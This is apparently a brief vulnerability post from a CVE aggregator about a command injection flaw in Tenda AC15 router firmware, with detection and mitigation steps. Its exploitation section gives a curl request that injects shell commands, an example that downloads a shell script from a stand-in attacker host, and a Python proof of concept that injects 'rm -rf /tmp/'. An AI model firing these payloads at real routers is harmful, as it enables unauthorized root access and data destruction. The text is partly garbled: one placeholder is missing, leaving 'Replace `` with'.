Tenda AC15, Command Injection, CVE-2025-25632 (Critical)

How CVE-2025-25632 Works

The vulnerability in Tenda AC15 router firmware v15.03.05.19 allows remote attackers to execute arbitrary commands via the `/goform/telnet` endpoint. The `handler` function improperly sanitizes user-supplied input, enabling command injection. An attacker can craft a malicious HTTP request containing OS commands in the `telnet` parameter, which are then executed with root privileges. This occurs due to insufficient input validation when enabling/disabling the telnet service. The lack of authentication checks further escalates the risk, allowing unauthenticated attackers to exploit this flaw.

DailyCVE Form

Platform: Tenda AC15
Version: v15.03.05.19
Vulnerability: Command Injection
Severity: Critical
Date: 04/10/2025

What Undercode Say:

Exploitation:

curl -X POST "http://<TARGET_IP>/goform/telnet" -d "telnet=enable; <malicious_command>"

Replace `` with arbitrary shell commands (e.g., reboot, wget http://attacker.com/shell.sh -O /tmp/shell.sh).

Detection:

nmap -p 80 --script http-vuln-cve2025-25632 <TARGET_IP>

Mitigation:

  1. Patch: Upgrade to Tenda AC15 firmware v15.03.05.21 or later.
  2. Workaround: Block unauthorized access to `/goform/telnet` via firewall rules:
    iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/telnet" --algo bm -j DROP
    

PoC Code (Python):

import requests
target = "http://192.168.1.1"
payload = "telnet=enable; rm -rf /tmp/"
requests.post(f"{target}/goform/telnet", data=payload)

Log Analysis:

Check router logs for suspicious POST requests to /goform/telnet:

grep -i "goform/telnet" /var/log/router.log

Firmware Analysis:

Extract firmware to verify patch:

binwalk -Me firmware.bin
grep -r "telnet" ./_firmware.bin.extracted/

References:

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25632
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top